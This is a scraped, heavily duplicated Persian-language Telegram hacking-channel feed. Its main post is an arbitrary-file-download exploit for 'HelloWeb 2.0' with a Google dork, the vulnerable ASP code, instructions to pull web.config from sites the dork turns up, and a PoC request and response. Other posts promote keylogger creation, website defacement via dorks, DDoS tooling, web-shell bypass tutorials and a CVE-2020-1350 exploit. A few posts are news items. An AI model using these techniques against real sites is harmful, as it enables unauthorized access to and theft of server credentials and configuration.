#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#Exploit #WebApp #HelloWeb #Arbitrary #File #Download #vulnerabilities
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
#اسیب_پذیری #برنامه_تحت_وب #بارگیری #فایل #دلخواه
➖➖➖➖➖➖➖➖➖
با سلام خدمت دوستان عزیز
در این قسمت اسیب پذیری یافت شده در برنامه ی تحت وب به نام HelloWeb را مورد بررسی قرار دهیم.
ابتدا توضیح مختصری در مورد باگ Arbitrary File Download بدیم :
به زبان ساده اگر توضیح بدم نوع دیگری از باگ ها LFI/RFI میباشد.
با این تفاوت که شما در این باگ قابلیت Travel Dir روندارین! یعنی نمیتونید بین مسیرهای موجود گشت و گذار کنید و فقط میتونید فایل یا فایل های مد نظر رو دانلود کنید.(البته بعضی از پارامتر های موجود این قابلیت رو داره).
اگه هنوز با باگ های LFI و RFI اشنا نیستید روی لینک های زیر کلیک کنید.
Link
➖➖➖➖➖➖➖➖➖➖➖
#Exploit-Title : ( HelloWeb 2.0 - Arbitrary File Download )
#Dork : ( Inurl:exec/file/download.asp )
#vulnerable-Code :
➖➖
filepath = Request.QueryString("filepath")
filename = Request.QueryString("filename")
filepath = Replace(filepath,"/","\")
➖➖
root_path = server.MapPath("/")
Set fso = CreateObject("Scripting.FileSystemObject")
Set root_folder = fso.GetFolder(root_path)
attachfile = root_path & filepath & "\" & filename
➖➖
Response.Clear
Response.ContentType = "application/unknown"
Response.AddHeader "Pragma", "no-cache"
Response.AddHeader "Expires", "0"
Response.AddHeader "Content-Transfer-Encoding", "binary"
Response.AddHeader "Content-Disposition","attachment; filename = " & Server.URLPathEncode(filename)
➖➖
Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
➖➖
objStream.Type = 1
objStream.LoadFromFile attachfile
➖➖
Response.BinaryWrite objStream.Read
Response.Flush
➖➖➖➖➖
طبق کد های مد نظر! این کد ها دسترسی دانلود فایل روبرای ما میده.
پارامتر هایی که اسیبپذیر هستند :
filtepath - filename - root_path - fso - root_folder - attachfile - objStream - strFile
چطوری میتوان از پارامترهای اسیب پذیر استفاده کرد :
به مثال زیر دقت کنید :
https://Target/download.asp?filepath=/&filename=hello.pdf
در این URL ما میفهمیم که فایل Download.asp اجازه ی دانلود فایل از مسیر / ( مسیر فعلی که ما هستیم)و فایل hello.pdf رو داده ...
➖➖➖➖➖➖➖➖➖
نحوه ی اکسپلویت این باگ :
#Exploit :
ابتدا با استفاده از دورک سایت اسیب پذیر رو پیدا کنید.
سپس
exec/file/download.asp?filepath=/&filename=web.config
روبه اخر هدفتون اضافه کنید.
البته این یک نمونه هست !
شما میتونید فایل های بیشتری رو با پارامتر متفاوت تست کنید.
➖➖➖➖➖➖➖➖
#PoC
تست :
این تست روی لوکال هاست صورت گرفته.
GET /exec/file/download.asp?filepath=/&filename=web.config HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
➖➖➖➖➖➖➖➖➖
RESPONSE: (پاسخ)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: application/unknown; Charset=utf-8
Expires: 0,Thu, 09 Jul 2020 10:51:14 GMT
Server:
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename = web.config
Set-Cookie: ASPSESSIONIDQQCBDRBB=BEMDPMDDKFHNFKFMJGHIKKKI; path=/
Access-Control-Allow-Origin: *
x-xss-protection: 1; mode=block
Date: Thu, 09 Jul 2020 10:51:14 GMT
Connection: close
➖➖➖
نحوه ی Fix این باگ تو پست بعدی براتون شرح میدم.
امیدوارم که با کارتون بیاد...
هرگونه سوالی داشتید میتونید توی گروه بپرسید.
#X0P4SH4
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Guy's
@LearnExploit
@Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ساخت کیلاگر با ابزار Hatkey در کالی لینوکس
نوشته شده با پایتون
#Keylogger
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
نوشته شده با پایتون
#Keylogger
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش دیفیس سایت با دورک (4)
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Deface #shell #dork #google_dork
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
آموزش ddos/dos با ابزار hammer در کالی لینوکس
Github Link
#ddos #dos #tools #kali #linux
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
Github Link
#ddos #dos #tools #kali #linux
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#فوری #مهم
خیلی فوری: سازمانها و شرکتهای ایرانی حواسشون باشه که یه آسیبپذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساختتون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا بهروزرسانیهارو انجام بدید.
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
خیلی فوری: سازمانها و شرکتهای ایرانی حواسشون باشه که یه آسیبپذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساختتون رو با دسترسی Domain Admin به مهاجم تقدیم کنه. همین حالا بهروزرسانیهارو انجام بدید.
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
#Private #Top #Tutorial
➖➖➖➖➖➖➖➖➖
Tutorial in 600 Member ! :
1 - Bypass anti sheller with zip File
2 - Alpha shell v4.1 decode Script
3 - IR0Day root Passwd Priv8 Dork
all in 600 Members
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
T.me/LearnExploit
T.me/Tech_Army
➖➖➖➖➖➖➖➖➖
Tutorial in 600 Member ! :
1 - Bypass anti sheller with zip File
2 - Alpha shell v4.1 decode Script
3 - IR0Day root Passwd Priv8 Dork
all in 600 Members
➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Boy's
T.me/LearnExploit
T.me/Tech_Army
Telegram
0Day.Today | Learn Exploit | Zero World | Dark web |
☝️Iп Tнε Nαмε Oғ GOD☝️
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
Web Exploiting
& Server Hacking
Shell & Admin panel Access
priv8 Google hacking Dorks
new vul & bugs discovering & Tut
❗️0 day is today❗️
تبلیغات : @LearnExploitAds
IR0Day.Today
ساعاتی پس از آنکه سخنگوی قوه قضائیه جمهوری اسلامی اعلام کرد دیوان عالی کشور حکم اعدام سه جوان را که در اعتراضات سراسری آبان حضور داشتند تایید کرده است، صدها هزار کاربر توئیتر با هشتگ «اعدام نکنید» توفان توئیتری به راه انداختند.
همزمان با گسترش این هشتگ در توئیتر و برخی دیگر از شبکههای اجتماعی، وبسایتهای رصدکننده اینترنت در جهان خبر دادند که دسترسی به اینترنت در داخل ایران با اختلال روبهرو شده است.
خبر تایید حکم اعدام امیرحسین مرادی، سعید تمجیدی و محمد رجبی را ابتدا چند روز پیش یکی از وکلای آنها منتشر کرده بود و سخنگوی قوه قضائیه روز سهشنبه ۲۴ تیر رسما این خبر را تایید کرد. راديو فردا
——————
0Day.Today
@LearnExploit
@Tech_Army
همزمان با گسترش این هشتگ در توئیتر و برخی دیگر از شبکههای اجتماعی، وبسایتهای رصدکننده اینترنت در جهان خبر دادند که دسترسی به اینترنت در داخل ایران با اختلال روبهرو شده است.
خبر تایید حکم اعدام امیرحسین مرادی، سعید تمجیدی و محمد رجبی را ابتدا چند روز پیش یکی از وکلای آنها منتشر کرده بود و سخنگوی قوه قضائیه روز سهشنبه ۲۴ تیر رسما این خبر را تایید کرد. راديو فردا
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
#فوری #مهم خیلی فوری: سازمانها و شرکتهای ایرانی حواسشون باشه که یه آسیبپذیری با درجه خطر ۱۰ از ۱۰ در سرویس DNS ویندوز پیدا شده که روی ویندوز سرورهای ۲۰۰۳ تا ۲۰۱۹ جواب میده! اونقدر خطرناکه که ممکنه تمام زیرساختتون رو با دسترسی Domain Admin به مهاجم تقدیم…
This media is not supported in your browser
VIEW IN TELEGRAM
نحوه کار اکسپلویت بحرانی CVE-2020-1350 .
ارسال ایمیل با کد های مخرب DNS میشه DNS Server یک سازمان را متوقف کرد
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
ارسال ایمیل با کد های مخرب DNS میشه DNS Server یک سازمان را متوقف کرد
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
پولی که امشب هکرها از هک حسابهای مهم توییتری در اوردن تا این ساعت بیشتر از ۱۴ برابر مقداریه که خود توییتر در برنامه جایزه کشف باگ میداده!
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
منبع : آفسک
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
پولی که امشب هکرها از هک حسابهای مهم توییتری در اوردن تا این ساعت بیشتر از ۱۴ برابر مقداریه که خود توییتر در برنامه جایزه کشف باگ میداده! منبع : آفسک iliyahr —————— 0Day.Today @LearnExploit @Tech_Army
به نظر میاد سیستم هویت سنجی توییتر هک شده و نه اینکه فقط چند فرد معروف هک شده باشن ، یعنی فرد / تیم هکر حتی به حساب من و شما هم میتونستن دسترسی بگیرن .
هدفشون هم که کلاهبرداری با بیت کوین بوده ( هرچند کارای بزرگ تری هم میتونستن بکنن )
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army
هدفشون هم که کلاهبرداری با بیت کوین بوده ( هرچند کارای بزرگ تری هم میتونستن بکنن )
iliyahr
——————
0Day.Today
@LearnExploit
@Tech_Army